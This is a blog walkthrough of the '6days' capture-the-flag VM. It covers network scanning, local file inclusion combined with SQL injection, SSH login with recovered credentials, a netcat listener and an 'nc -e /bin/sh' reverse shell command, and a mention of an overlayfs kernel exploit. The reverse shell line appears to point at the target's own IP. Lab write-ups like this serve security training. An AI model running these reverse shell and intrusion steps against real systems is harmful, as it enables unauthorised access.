Hacking Articles|Raj Chandel's Blog: Hack the 64days VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “CanYouPwn.Me” and it is another boot2root challenge where we have to execute flag file to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap –sV 192.168.0.18

We find port is open so we open this ip on our browser.

This page maybe vulnerable to SQL injection but a WAF is implemented to protect it. So we take a look at the source at the source code for further information.

We find that this page maybe vulnerable to LFI and RFI so we use curl to implement our attack.

We find that LFI is working on this site. Now we take a look at the config file to find the name of the database.

Taking a look at the config file we found that it accessible through localhost. So we use SQL injection with LFI to access the database. Port 80 had WAF so we use 8080 to access the localhost.

We find a username and password. We know that ssh is open so we try this username and password to login through ssh.

ssh andrea@192.168.0.18

Now we are connected through ssh, but when we try to run commands it seems like no command is working. It is possible that output is redirected to null. So we use netcat to get a reverse shell

We set up a listener on our system first.

nc –lvp 1234

No we try to connect using netcat reverse shell

nc –e /bin/sh 192.168.0.18 1234

When we got the shell we see that we can see the output of the commands. We also find that the OS is Ubuntu 12.04 that is vulnerable to overlays exploit.